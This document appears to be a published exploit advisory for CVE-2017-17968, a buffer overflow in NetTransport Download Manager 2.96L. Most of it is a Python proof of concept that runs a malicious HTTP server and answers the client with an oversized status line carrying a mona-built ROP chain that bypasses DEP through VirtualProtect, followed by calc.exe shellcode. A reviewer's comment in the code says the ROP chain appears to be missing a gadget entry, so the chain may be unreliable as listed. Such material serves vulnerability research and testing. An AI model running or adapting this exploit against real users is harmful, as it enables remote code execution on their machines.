# Exploit Title: Buffer overflow in NetTransport Download Manager - Version 2.96L (DEP Bypass)
# CVE: CVE-2017-17968
# Date: 28-12-2017
# Software Link: http://xi-soft.com/downloads/NXSetup_x86.zip
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://xi-soft.com/default.htm
# Category: webapps
# Impact: Code execution

1. Description

A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow a remote HTTP server to execute arbitrary code on the client host (the CVE description says "NAS devices") via a long HTTP response. To exploit it, the attacker hosts a malicious HTTP server and answers the client's download request with an oversized HTTP response header (an over-long status line in the PoC below). The PoC bypasses DEP with a ROP chain built from NetTransport.exe and libssl.dll gadgets that calls VirtualProtect() on the stack before returning into the shellcode; gadget addresses are fixed, so the chain is specific to this build. A successful attack results in code execution with the privileges of the user running NetTransport.

2. Proof of Concept


#!/usr/bin/python




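# "Tiny calc.exe" shellcode from the original PoC. The published listing had lost
# the backslashes of the \x escapes, which turned it into ASCII text; the byte
# escapes are restored here (101 bytes).
_SHELLCODE = (
    b"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
    b"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
    b"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
    b"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
    b"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
    b"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
    b"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
    b"\x1c\x39\xbd"
)


def _build_rop_chain():
    """Return the mona.py-generated DEP-bypass ROP chain as packed little-endian DWORDs.

    Gadget addresses come from NetTransport.exe and libssl.dll and are fixed,
    so the chain only works against this exact build. The layout is mona's
    VirtualProtect() pattern: the registers are loaded and the final PUSHAD
    turns them into the call frame -- ESI = &VirtualProtect (via XCHG EAX,ESI),
    EBP = return into the new stack pointer (push esp # ret), EBX = dwSize
    (0x201), EDX = flNewProtect (0x40 = PAGE_EXECUTE_READWRITE),
    ECX = lpflOldProtect (writable location), EDI = ROP NOP.

    NOTE(review): as listed, the first gadget (POP EAX) pops the *next gadget
    address* 0x00485ed3 into EAX and then returns into 0x41414141 filler.
    mona's VirtualProtect chains put a pointer to the VirtualProtect IAT entry
    right after the POP EAX and dereference it with MOV EAX,[EAX]; that entry
    appears to be missing from this listing and the MOV reads [ECX]. Verify
    the chain against the original mona output before relying on it.

    Returns:
        bytes: the chain, 32 DWORDs / 128 bytes.
    """
    rop_gadgets = [
        0x10001653,  # POP EAX # RETN [libssl.dll]
        0x00485ed3,  # MOV EAX,DWORD PTR DS:[ECX] # POP EDI # POP ESI # POP EBP # POP ECX # RETN 0x04 [NetTransport.exe]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x00496596,  # XCHG EAX,ESI # RETN 0x0A [NetTransport.exe]
        0x41414141,  # Filler (RETN offset compensation)
        0x004ea919,  # POP EBP # RETN [NetTransport.exe]
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x4141,      # Filler (RETN offset compensation) -- kept as published; packs as 41 41 00 00
        0x004608df,  # & push esp # ret [NetTransport.exe]
        0x0045e75f,  # POP EBX # RETN [NetTransport.exe]
        0x00000201,  # 0x00000201 -> ebx (dwSize)
        0x00554dbc,  # POP ECX # RETN [NetTransport.exe]
        0x00000040,  # 0x00000040 -> ecx, moved into edx below (flNewProtect)
        0x00499c92,  # XOR EDX,EDX # RETN 0x04 [NetTransport.exe]
        0x0041254c,  # ADC EDX,ECX # POP EBX # ADD ESP,0C # RETN 0x04 [NetTransport.exe]
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x0054e559,  # POP ECX # RETN [NetTransport.exe]
        0x41414141,  # Filler (RETN offset compensation)
        0x10004b93,  # &Writable location [libssl.dll] (lpflOldProtect)
        0x0050343f,  # POP EDI # RETN [NetTransport.exe]
        0x00487073,  # RETN (ROP NOP) [NetTransport.exe]
        0x10001653,  # POP EAX # RETN [libssl.dll]
        0x90909090,  # nop
        0x00486f78,  # PUSHAD # RETN [NetTransport.exe]
    ]
    return b"".join(struct.pack("<I", gadget) for gadget in rop_gadgets)


def _build_response(max_size=60000, overwrite_offset=16739):
    """Return the crafted HTTP response that overflows the client's buffer.

    Payload layout: ``overwrite_offset`` bytes of 'A' (the offset at which the
    original author observed control -- the PoC notes a crash at that length
    and EIP = 0x004E7828), the ROP chain, a 10-byte NOP sled, the shellcode,
    then 'C' filler so that the payload is exactly ``max_size`` bytes. The
    payload is placed in the status line after ``HTTP/1.1 200 ``.

    Args:
        max_size: total payload length in bytes (default 60000 as published).
        overwrite_offset: number of 'A' bytes before the ROP chain.

    Returns:
        bytes: the full response to send to the client.

    Raises:
        ValueError: if ``max_size`` cannot hold the fixed parts of the payload.
    """
    rop_chain = _build_rop_chain()
    nops = b"\x90" * 10
    fixed = b"A" * overwrite_offset + rop_chain + nops + _SHELLCODE
    if len(fixed) > max_size:
        raise ValueError(
            "max_size %d is smaller than the fixed payload (%d bytes)"
            % (max_size, len(fixed))
        )
    payload = fixed + b"C" * (max_size - len(fixed))
    return b"HTTP/1.1 200 " + payload + b" "


def main():
    """Wait for the NetTransport client to connect and serve it the crafted response.

    Binds ``host``:``port`` (point the vulnerable client at this address),
    accepts a single connection, prints the client's request, sends the
    response built by ``_build_response`` and closes both sockets even when
    an error occurs. Returns None.
    """
    host = "192.168.205.131"
    port = 80

    response = _build_response()

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Allow an immediate re-run after the client crashes while the previous
    # listener is still in TIME_WAIT.
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    try:
        srv.bind((host, port))
        srv.listen(1)
        print(" [+] Listening on %d ..." % port)

        client, addr = srv.accept()
        print("[+] Connection accepted from %s" % addr[0])
        try:
            print(client.recv(1000))
            # sendall(): a plain send() may deliver only part of a 60 KB buffer,
            # which would truncate the ROP chain or shellcode.
            client.sendall(response)
            print("[+] Sending buffer: OK ")
        finally:
            client.close()
    finally:
        srv.close()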

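# Imported at module level (not inside the __main__ guard) so that main() can
# also be called from another module without a NameError on socket/struct.
import socket
import struct

if __name__ == "__main__":
    main()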







3. Solution:

No vendor fix was available at the time of writing. Until a patched build is released, avoid using NetTransport to download from untrusted servers: the crafted response is delivered by the HTTP server itself, so any server the client connects to (or an on-path attacker on an unencrypted connection) can trigger the overflow.